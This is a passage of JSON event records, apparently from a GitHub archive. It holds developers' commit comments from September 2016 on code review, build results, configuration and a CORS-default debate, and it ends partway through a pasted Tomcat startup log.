{"id":"4632047807","type":"CommitCommentEvent","actor":{"login":"wilsonrector"},"repo":{"name":"SRosenshein/blocipedia"},"payload":{"comment":{"id":19210876,"position":17,"line":10,"path":"db/seeds.rb","commit_id":"a45dd1ae452e7601add5fdf3c01f06e70590393f","created_at":"2016-09-28T17:05:33Z","updated_at":"2016-09-28T17:05:33Z","body":"```ruby\r\nuser_array = []\r\n25.times do\r\n  +    pw = Faker::Internet.password(6)\r\n\r\n         user_array << {email: Faker::Internet.email,\r\n         password: pw,\r\n         password_confirmation: pw}\r\nend\r\nUser.create(user_array)\r\n```\r\n"}},"created_at":"2016-09-28T17:05:33Z"}
{"id":"4632048365","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19210879,"position":148,"line":148,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-28T17:05:39Z","updated_at":"2016-09-28T17:05:39Z","body":"`def get_files_by_file_size` happens both here and in dockered_chunked_call.py. Maybe it should be in toillib or some other shared file. Or there might not be sufficient reason to break it out with it being used only twice."}},"created_at":"2016-09-28T17:05:39Z"}
{"id":"4632049878","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19210885,"position":59,"line":16,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T17:05:56Z","updated_at":"2016-09-28T17:05:56Z","body":"What do you mean by separate input strings as line breaks??\r\nAnd, okay, I thought the split took care of adjacent spaces, but I guess it doesn't.. (tested it just now)"}},"created_at":"2016-09-28T17:05:56Z"}
{"id":"4632051612","type":"CommitCommentEvent","actor":{"login":"v4hn"},"repo":{"name":"Jntzko/moveit_msgs"},"payload":{"comment":{"id":19210892,"position":1,"line":1,"path":"srv/PlanGrasps.srv","commit_id":"c02c0b599aa2632b3361f1e6cc2eb942247dd956","created_at":"2016-09-28T17:06:15Z","updated_at":"2016-09-28T17:06:15Z","body":"I would propose to reuse the name `GraspPlanning.srv` from the obsolete `manipulation_msgs` package."}},"created_at":"2016-09-28T17:06:15Z"}
{"id":"4632054529","type":"CommitCommentEvent","actor":{"login":"Rylock"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19210899,"position":91,"line":4254,"path":"EMF/events/mongol_events.txt","commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-28T17:06:47Z","updated_at":"2016-09-28T17:06:47Z","body":"EMF+Vanilla would still get rid of Temujin and his dynasty members in the same way"}},"created_at":"2016-09-28T17:06:47Z"}
{"id":"4632055051","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19210901,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-28T17:06:52Z","updated_at":"2016-09-28T17:06:52Z","body":"Okay, what if the build is not part of a pull request but is a build auto-started by pushing to a new branch? Will it report then?\r\n\r\nI would think you would instead want to use something like `CIRCLE_BRANCH` to identify the branch you're wanting to report for. I don't really want reporting on all these random branches prior to them becoming a pull request. I just want, say, `develop` to be the source of truth for my documentation status."}},"created_at":"2016-09-28T17:06:52Z"}
{"id":"4632058117","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19210911,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T17:07:26Z","updated_at":"2016-09-28T17:07:26Z","body":"> I think this is not 100% correct. Also CSD windows might have only .title\r\nand .titlebutton. This is called .default-decoration... So to save space\r\nyou don't need .ssd.\r\n\r\nYeah you're right I meant default-decorations...\r\n\r\n> It looks like .titlebutton { margin: 10px 4px; } should work.\r\n\r\nOK. I'll check this later. Thanks again, issue may be solved.\r\n\r\nBest Regards."}},"created_at":"2016-09-28T17:07:26Z"}
{"id":"4632058640","type":"CommitCommentEvent","actor":{"login":"JayaMPB9"},"repo":{"name":"haoel/leetcode"},"payload":{"comment":{"id":19210914,"position":null,"line":null,"path":null,"commit_id":"2f3a77de45a6addf7aae3fb6988e8422a7a3eb6c","created_at":"2016-09-28T17:07:31Z","updated_at":"2016-09-28T17:07:31Z","body":"then, whatever program we write, it should be in object oriented , (not structured oriented like which we do it on hackerrank or codechef ) am i right?"}},"created_at":"2016-09-28T17:07:31Z"}
{"id":"4632060376","type":"CommitCommentEvent","actor":{"login":"v4hn"},"repo":{"name":"Jntzko/moveit_msgs"},"payload":{"comment":{"id":19210918,"position":5,"line":5,"path":"srv/PlanGrasps.srv","commit_id":"c02c0b599aa2632b3361f1e6cc2eb942247dd956","created_at":"2016-09-28T17:07:49Z","updated_at":"2016-09-28T17:07:49Z","body":"This should be updated to `group_name` instead with the explanation `the planning group used`"}},"created_at":"2016-09-28T17:07:49Z"}
{"id":"4632061888","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19210925,"position":562,"line":562,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-28T17:08:06Z","updated_at":"2016-09-28T17:08:06Z","body":"OK so work_dir is passed from job to job, but gets recreated by every job.\r\n\r\nThat's pretty weird and ought to be documented, maybe in each such job's docstring."}},"created_at":"2016-09-28T17:08:06Z"}
{"id":"4632063203","type":"CommitCommentEvent","actor":{"login":"josephg5"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":19210927,"position":null,"line":null,"path":null,"commit_id":"dacab57e33c5cf272aa95607ebfcbc4ff927703f","created_at":"2016-09-28T17:08:19Z","updated_at":"2016-09-28T17:08:19Z","body":"that was quick :) thanks!"}},"created_at":"2016-09-28T17:08:19Z"}
{"id":"4632065167","type":"CommitCommentEvent","actor":{"login":"mauro3"},"repo":{"name":"JuliaPlots/StatPlots.jl"},"payload":{"comment":{"id":19210934,"position":null,"line":null,"path":null,"commit_id":"f34ff306066256a735bbf253b917de7c61b9149f","created_at":"2016-09-28T17:08:38Z","updated_at":"2016-09-28T17:08:38Z","body":"I could have sworn I tried this... sorry!"}},"created_at":"2016-09-28T17:08:38Z"}
{"id":"4632075563","type":"CommitCommentEvent","actor":{"login":"sladomic"},"repo":{"name":"jogrimst/literacyapp-analytics"},"payload":{"comment":{"id":19210969,"position":null,"line":null,"path":null,"commit_id":"09517b59cab9e9003fc374262bcdd58df1faf21f","created_at":"2016-09-28T17:10:31Z","updated_at":"2016-09-28T17:10:31Z","body":"@jogrimst Why do you need to use the ByteArrayOutputStream? \r\n\r\nIn our app we just use the FileOutputStream. Or do I just overlook something?\r\n\r\n`public String saveMatToImage(MatName m, String path){\r\n        String fullpath = path + m.getName() + \".png\";\r\n        Mat mat = m.getMat();\r\n        Bitmap bitmap = Bitmap.createBitmap(mat.cols(), mat.rows(), Bitmap.Config.ARGB_8888);\r\n        Utils.matToBitmap(mat, bitmap);\r\n        File file = new File(fullpath);\r\n        try {\r\n            FileOutputStream os = new FileOutputStream(file);\r\n            bitmap.compress(Bitmap.CompressFormat.PNG, 100, os);\r\n            os.close();\r\n        } catch (FileNotFoundException e) {\r\n            e.printStackTrace();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n        return fullpath;\r\n    }`"}},"created_at":"2016-09-28T17:10:31Z"}
{"id":"4632077921","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210973,"position":null,"line":null,"path":null,"commit_id":"238b61c80357e4c23cfbc8c032b80736165c12ea","created_at":"2016-09-28T17:10:56Z","updated_at":"2016-09-28T17:10:56Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-28T17:10:56Z"}
{"id":"4632082414","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210983,"position":null,"line":null,"path":null,"commit_id":"b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77","created_at":"2016-09-28T17:11:46Z","updated_at":"2016-09-28T17:11:46Z","body":"update_standards_gem (asparke2) - Win64-Windows-7-VisualStudio-12: OK (2406 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b0d0a01c8dbdc6a728bdb19dcec990e7c8ddba77-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T17:11:46Z"}
{"id":"4632088244","type":"CommitCommentEvent","actor":{"login":"sgress454"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19210995,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T17:12:51Z","updated_at":"2016-09-28T17:12:51Z","body":"@ejcx \r\n> I would love for you to show me one example of a site that this is \"desired\".\r\n\r\nIt's desirable for testing, since it lets you lift the same site on a different port or a local test domain without updating your settings.  \r\n\r\nAs @mikermcneil, this is really a config issue -- we'll review this for the next release.  But it's important to note that the `...` you put in your quote about the commit covers the part where the user _opts in to this functionality_, which makes it look like I was saying that Sails app are wide open \"by default\".  This is not the case.  By default, Sails apps are completely locked down (blocking all cross-origin requests).  You have to explicitly turn CORS settings on to allow requests from other origins."}},"created_at":"2016-09-28T17:12:51Z"}
{"id":"4632091340","type":"CommitCommentEvent","actor":{"login":"stevehollaar"},"repo":{"name":"r0b1n/rnrf-relay-renderer"},"payload":{"comment":{"id":19211010,"position":5,"line":50,"path":"src/RelayComponentRenderer.js","commit_id":"9560a7cd99cae4bd5be7d683619c8572882225f6","created_at":"2016-09-28T17:13:26Z","updated_at":"2016-09-28T17:13:26Z","body":"If you look at their `NavigationDrawer` example: https://github.com/aksonov/react-native-router-flux/blob/e2fb556b708527165d3a729787e6a7aa8ecdb9b3/Example/components/NavigationDrawer.js, the scene component is expecting `navigationState` and `onNavigate` to be passed as props (which this change allows).\r\nWe could pass these in as `routerProps` (probably would be better), but then we deviate from `rnrf`, meaning the behavior would change, depending on whether the scene component is a Relay Container."}},"created_at":"2016-09-28T17:13:26Z"}
{"id":"4632092944","type":"CommitCommentEvent","actor":{"login":"doowruc"},"repo":{"name":"infrabel/GNaP.Data.Scope.EntityFramework"},"payload":{"comment":{"id":19211015,"position":null,"line":null,"path":null,"commit_id":"c47e02a9c33a1e3e90b1d5d0e09215ac2f2b0234","created_at":"2016-09-28T17:13:45Z","updated_at":"2016-09-28T17:13:45Z","body":"I have committed an updated Demo to my fork (https://github.com/doowruc/GNaP.Data.Scope.EntityFramework) which uses Unity and you can see the error for yourself"}},"created_at":"2016-09-28T17:13:45Z"}
{"id":"4632093308","type":"CommitCommentEvent","actor":{"login":"mouse07410"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19211016,"position":46,"line":351,"path":"src/p11_key.c","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-28T17:13:49Z","updated_at":"2016-09-28T17:13:49Z","body":"Then it must be clarified - because, for example, in the PIV documentation the four locations for the keys on a PIV token are called \"slots\": 9A, 9C, 9D, 9E. These slots are used to refer to the appropriate keys. I.e., I can say \"use a key at 9A\", or \"use a PIV AUTH key\".\r\n\r\nYou're using the term \"slots\" with a different meaning. Probably like \"a reader with several slots\", or \"a computer with several readers, each considered by PKCS#11 as a 'slot'\". It does not look like this patch is doing that, though."}},"created_at":"2016-09-28T17:13:49Z"}
{"id":"4632104497","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19211059,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-28T17:15:53Z","updated_at":"2016-09-28T17:15:53Z","body":"点赞！我去看看WPF效果如何。另外我开始做这个的DSL系统了。"}},"created_at":"2016-09-28T17:15:53Z"}
{"id":"4632106357","type":"CommitCommentEvent","actor":{"login":"pepyakin"},"repo":{"name":"VKCOM/vk-java-sdk"},"payload":{"comment":{"id":19211064,"position":48,"line":170,"path":"sdk/src/main/java/com/vk/api/sdk/queries/messages/MessagesSendQuery.java","commit_id":"e7fb0dc7974e81c557b376f7a7782bc3310c7187","created_at":"2016-09-28T17:16:13Z","updated_at":"2016-09-28T17:16:13Z","body":"This looks like typo"}},"created_at":"2016-09-28T17:16:13Z"}
{"id":"4632115443","type":"CommitCommentEvent","actor":{"login":"gjs1985"},"repo":{"name":"hannonhill/Example-Sites"},"payload":{"comment":{"id":19211079,"position":null,"line":null,"path":null,"commit_id":"7def9bc9cbf6133052e8db175dab331a07cecfe5","created_at":"2016-09-28T17:17:48Z","updated_at":"2016-09-28T17:17:48Z","body":"In order for this to work do I need to have version 7.14.1?  I was able to import the site with files.  But none of the legends displayed over the map.  Not sure.  Any suggestions?"}},"created_at":"2016-09-28T17:17:48Z"}
{"id":"4632119979","type":"CommitCommentEvent","actor":{"login":"DavidEGrayson"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19211092,"position":9,"line":13,"path":"app/assets/javascripts/discourse/lib/url.js.es6","commit_id":"8871c9852c874070911ccb67c22e43a0c45ad91e","created_at":"2016-09-28T17:18:36Z","updated_at":"2016-09-28T17:18:36Z","body":"Does this fix the category links and RSS feed links which were also broken?  Also, does this commit allow someone to host arbitrary static files on their domain and link to them from forum posts?\r\n\r\nIf not, I still suggest that any route that results in a 404 should result in a full page reload in order to give the HTTP server and the back-end server a chance to respond to the request."}},"created_at":"2016-09-28T17:18:36Z"}
{"id":"4632120156","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19211094,"position":null,"line":null,"path":null,"commit_id":"dc998c51ecaf8a42487ac8cb1591f00a255a742a","created_at":"2016-09-28T17:18:39Z","updated_at":"2016-09-28T17:18:39Z","body":"[Flask-SQLAlchemy Quickstart](http://flask-sqlalchemy.pocoo.org/2.1/quickstart/)\r\nPrimary changes:\r\n- Install Flask-SQLAlchemy\r\n- Add SQLAlchemy database URI to config\r\n- Create User model\r\n- Init db and create all tables\r\n- Create initial User"}},"created_at":"2016-09-28T17:18:39Z"}
{"id":"4632121462","type":"CommitCommentEvent","actor":{"login":"jamesokbo"},"repo":{"name":"jamesokbo/GroveMonitor"},"payload":{"comment":{"id":19211099,"position":4,"line":6,"path":"mainRPi/server/models/phReading.js","commit_id":"d65f011e408d2186dcf79bbc181208b016fd9c03","created_at":"2016-09-28T17:18:53Z","updated_at":"2016-09-28T17:18:53Z","body":"The ID of the mainRPi is not needed here. "}},"created_at":"2016-09-28T17:18:53Z"}
{"id":"4632123142","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211103,"position":null,"line":null,"path":null,"commit_id":"f97745ec889809953d4fcf21699a8fe0ca2a6fab","created_at":"2016-09-28T17:19:12Z","updated_at":"2016-09-28T17:19:12Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=70)"}},"created_at":"2016-09-28T17:19:12Z"}
{"id":"4632123195","type":"CommitCommentEvent","actor":{"login":"cornelf"},"repo":{"name":"dcos/adminrouter"},"payload":{"comment":{"id":19211104,"position":13,"line":59,"path":"nginx.master.conf","commit_id":"6c7c97a3bb46cb87f6ba5dec98c68b790a3349a8","created_at":"2016-09-28T17:19:12Z","updated_at":"2016-09-28T17:19:12Z","body":"is this going to be replaced by http2?"}},"created_at":"2016-09-28T17:19:12Z"}
{"id":"4632124147","type":"CommitCommentEvent","actor":{"login":"ArmandH"},"repo":{"name":"ccrisan/streameye"},"payload":{"comment":{"id":19211108,"position":null,"line":null,"path":null,"commit_id":"88fc2a5ce9a61c820b07df3578ce8546c0609e4c","created_at":"2016-09-28T17:19:23Z","updated_at":"2016-09-28T17:19:23Z","body":"Thanks for clearing this up and thanks for spotting the typo"}},"created_at":"2016-09-28T17:19:23Z"}
{"id":"4632124404","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19211109,"position":135,"line":135,"path":"it/mozorg/newsletters.lang","commit_id":"3a302258f6dd8bfe17692d3a02d30f6c0369b506","created_at":"2016-09-28T17:19:26Z","updated_at":"2016-09-28T17:19:26Z","body":"Ho visto ora che ci sono pure queste. \r\n@kitsunenosarat, chiedo prima di tradurre (lo faccio domani), questa stringa per coerenza dovrebbe rimanere in inglese perché è il nome della newsletter, però è davvero strano non tradurla (idem per Tips for Firefox Accounts).\r\nSecondo te sono da lasciare tutti in inglese o dove non c'è dubbio di confusione si può mettere la traduzione italiana?\r\n"}},"created_at":"2016-09-28T17:19:26Z"}
{"id":"4632124810","type":"CommitCommentEvent","actor":{"login":"ejcx"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19211110,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T17:19:30Z","updated_at":"2016-09-28T17:19:30Z","body":"That is correct @sgress454 . Anyone who turns on CORS has a default vulnerable config.\r\n\r\n\"It's desirable for testing\". I completely disagree. It's easy and simple to add a couple specific origins. Bad practices in dev carry over to bad practices in prod. I think it's clear that there is no use for default behavior that sails exhibits. I'll leave it at that."}},"created_at":"2016-09-28T17:19:30Z"}
{"id":"4632130779","type":"CommitCommentEvent","actor":{"login":"gayathrinair2709"},"repo":{"name":"gayathrinair2709/project0"},"payload":{"comment":{"id":19211126,"position":null,"line":null,"path":null,"commit_id":"e1be5e0facf1076e71e15439e855574144cbd469","created_at":"2016-09-28T17:20:38Z","updated_at":"2016-09-28T17:20:38Z","body":"below corrections were done to remove the error\r\npackage com.niit.shop.config;\r\n\r\nimport java.util.Properties;\r\n\r\nimport javax.sql.DataSource;\r\n\r\nimport org.apache.commons.dbcp2.BasicDataSource;\r\nimport org.hibernate.SessionFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.context.annotation.Bean;\r\nimport org.springframework.context.annotation.ComponentScan;\r\nimport org.springframework.context.annotation.Configuration;\r\nimport org.springframework.orm.hibernate4.HibernateTransactionManager;\r\nimport org.springframework.orm.hibernate4.LocalSessionFactoryBuilder;\r\nimport org.springframework.transaction.annotation.EnableTransactionManagement;\r\n\r\nimport com.niit.shop.dao.CartDAO;\r\nimport com.niit.shop.dao.CartDAOImpl;\r\nimport com.niit.shop.dao.CategoryDAO;\r\nimport com.niit.shop.dao.CategoryDAOImpl;\r\nimport com.niit.shop.dao.ProductDAO;\r\nimport com.niit.shop.dao.ProductDAOImpl;\r\nimport com.niit.shop.dao.SupplierDAO;\r\nimport com.niit.shop.dao.SupplierDAOImpl;\r\nimport com.niit.shop.model.Cart;\r\nimport com.niit.shop.model.Category;\r\nimport com.niit.shop.model.Product;\r\nimport com.niit.shop.model.Supplier;\r\nimport com.niit.shop.model.User;\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n@Configuration\r\n@ComponentScan(\"com.niit.shop\")\r\n@EnableTransactionManagement\r\n\r\n\t\r\npublic class ApplicationContextConfig {\r\n    \r\n    @Bean(name = \"dataSource\")\r\n    public DataSource getDataSource() {\r\n    \tBasicDataSource dataSource = new BasicDataSource();\r\n    \tdataSource.setDriverClassName(\"org.h2.Driver\");\r\n    \tdataSource.setUrl(\"jdbc:h2:tcp://localhost/~/shop\");\r\n    \tdataSource.setUsername(\"g3\");\r\n    \tdataSource.setPassword(\"1234\");\r\n    \t\r\n    \treturn dataSource;\r\n    }\r\n    \r\n    \r\n    private Properties getHibernateProperties() {\r\n    \tProperties properties = new Properties();\r\n    \tproperties.setProperty(\"hibernate.hbm2ddl.auto\", \"update\");\r\n    \tproperties.put(\"hibernate.show_sql\", \"true\");\r\n    \tproperties.put(\"hibernate.dialect\", \"org.hibernate.dialect.H2Dialect\");\r\n    \treturn properties;\r\n    }\r\n    \r\n    @Autowired\r\n    @Bean(name = \"sessionFactory\")\r\n    public SessionFactory getSessionFactory(DataSource dataSource) {\r\n    \tLocalSessionFactoryBuilder sessionBuilder = new LocalSessionFactoryBuilder(dataSource);\r\n    \tsessionBuilder.addProperties(getHibernateProperties());\r\n    \tsessionBuilder.addAnnotatedClasses(Category.class);\r\n    \tsessionBuilder.addAnnotatedClasses(Supplier.class);\r\n    \tsessionBuilder.addAnnotatedClasses(User.class);\r\n    \tsessionBuilder.addAnnotatedClasses(Product.class);\r\n    \tsessionBuilder.addAnnotatedClasses(Cart.class);\r\n    \treturn sessionBuilder.buildSessionFactory();\r\n    \t\r\n    }\r\n    \r\n\t@Autowired\r\n\t@Bean(name = \"transactionManager\")\r\n\tpublic HibernateTransactionManager getTransactionManager(\r\n\t\t\tSessionFactory sessionFactory) {\r\n\t\tHibernateTransactionManager transactionManager = new HibernateTransactionManager(\r\n\t\t\t\tsessionFactory);\r\n\r\n\t\treturn transactionManager;\r\n\t}\r\n    \r\n   @Autowired\r\n   @Bean(name = \"CategoryDAO\")\r\n   public CategoryDAO getCategoryDao(SessionFactory sessionFactory) {\r\n   return new CategoryDAOImpl(sessionFactory);\r\n   }\r\n\r\n   @Autowired\r\n   @Bean(name = \"SupplierDAO\")\r\n   public SupplierDAO getSupplierDao(SessionFactory sessionFactory) {\r\n   return new SupplierDAOImpl(sessionFactory);\r\n   }\r\n   \r\n   @Autowired\r\n   @Bean(name = \"ProductDAO\")\r\n   public ProductDAO getProductDao(SessionFactory sessionFactory) {\r\n   return new ProductDAOImpl(sessionFactory);\r\n   }\r\n   @Autowired\r\n   @Bean(name = \"CartDAO\")\r\n   public CartDAO getCartDao(SessionFactory sessionFactory) {\r\n   \treturn new CartDAOImpl(sessionFactory);\r\n   }\r\n}\r\n}\r\n"}},"created_at":"2016-09-28T17:20:38Z"}
{"id":"4632132780","type":"CommitCommentEvent","actor":{"login":"peter-grajcar-13"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211132,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:21:01Z","updated_at":"2016-09-28T17:21:01Z","body":"`SELECT *` je tu dosť zbytočné skôr by som použil niečo ako `\"SELECT COUNT(*) FROM \" + TABLE_DRUGS + \" AS count\"` je to efektívnejšie"}},"created_at":"2016-09-28T17:21:01Z"}
{"id":"4632136824","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211140,"position":null,"line":null,"path":null,"commit_id":"8d47e93843cd0de7914f97072568fec22411fbdf","created_at":"2016-09-28T17:21:44Z","updated_at":"2016-09-28T17:21:44Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=71)"}},"created_at":"2016-09-28T17:21:44Z"}
{"id":"4632138536","type":"CommitCommentEvent","actor":{"login":"gayathrinair2709"},"repo":{"name":"gayathrinair2709/project0"},"payload":{"comment":{"id":19211143,"position":null,"line":null,"path":null,"commit_id":"e1be5e0facf1076e71e15439e855574144cbd469","created_at":"2016-09-28T17:22:01Z","updated_at":"2016-09-28T17:22:01Z","body":"But it popped up new error\r\n\r\nSep 28, 2016 10:38:22 PM org.apache.tomcat.util.digester.SetPropertiesRule begin\r\nWARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property 'source' to 'org.eclipse.jst.j2ee.server:shop' did not find a matching property.\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Server version:        Apache Tomcat/7.0.72\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Server built:          Sep 14 2016 12:12:26 UTC\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Server number:         7.0.72.0\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: OS Name:               Windows 7\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: OS Version:            6.1\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Architecture:          amd64\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Java Home:             C:\\Program Files\\Java\\jre1.8.0_91\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: JVM Version:           1.8.0_91-b15\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: JVM Vendor:            Oracle Corporation\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: CATALINA_BASE:         E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: CATALINA_HOME:         E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Command line argument: -Dcatalina.base=E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Command line argument: -Dcatalina.home=E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\r\nSep 28, 2016 10:38:22 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Command line argument: -Dwtp.deploy=E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\wtpwebapps\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Command line argument: -Djava.endorsed.dirs=E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\endorsed\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.startup.VersionLoggerListener log\r\nINFO: Command line argument: -Dfile.encoding=Cp1252\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.core.AprLifecycleListener lifecycleEvent\r\nINFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: C:\\Program Files\\Java\\jre1.8.0_91\\bin;C:\\Windows\\Sun\\Java\\bin;C:\\Windows\\system32;C:\\Windows;C:/Program Files/Java/jre1.8.0_91/bin/server;C:/Program Files/Java/jre1.8.0_91/bin;C:/Program Files/Java/jre1.8.0_91/lib/amd64;C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Program Files\\Java\\jdk1.7.0_51\\bin;C:\\Program Files (x86)\\Skype\\Phone\\;C:\\Program Files\\Java\\jdk1.8.0_91\\bin;E:\\eclipse-jee-mars-2-win32-x86_64\\eclipse;;.\r\nSep 28, 2016 10:38:23 PM org.apache.coyote.AbstractProtocol init\r\nINFO: Initializing ProtocolHandler [\"http-bio-8080\"]\r\nSep 28, 2016 10:38:23 PM org.apache.coyote.AbstractProtocol init\r\nINFO: Initializing ProtocolHandler [\"ajp-bio-8009\"]\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.startup.Catalina load\r\nINFO: Initialization processed in 1066 ms\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.core.StandardService startInternal\r\nINFO: Starting service Catalina\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.core.StandardEngine startInternal\r\nINFO: Starting Servlet Engine: Apache Tomcat/7.0.72\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile\r\nINFO: validateJarFile(E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\wtpwebapps\\shop\\WEB-INF\\lib\\javax.el-api-3.0.1-b04.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/el/Expression.class\r\nSep 28, 2016 10:38:23 PM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile\r\nINFO: validateJarFile(E:\\apache-tomcat-7.0.72-windows-x64\\apache-tomcat-7.0.72\\wtpwebapps\\shop\\WEB-INF\\lib\\javax.servlet-api-3.1.0.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class\r\nSep 28, 2016 10:38:25 PM org.apache.catalina.startup.TldConfig execute\r\nINFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.\r\nSep 28, 2016 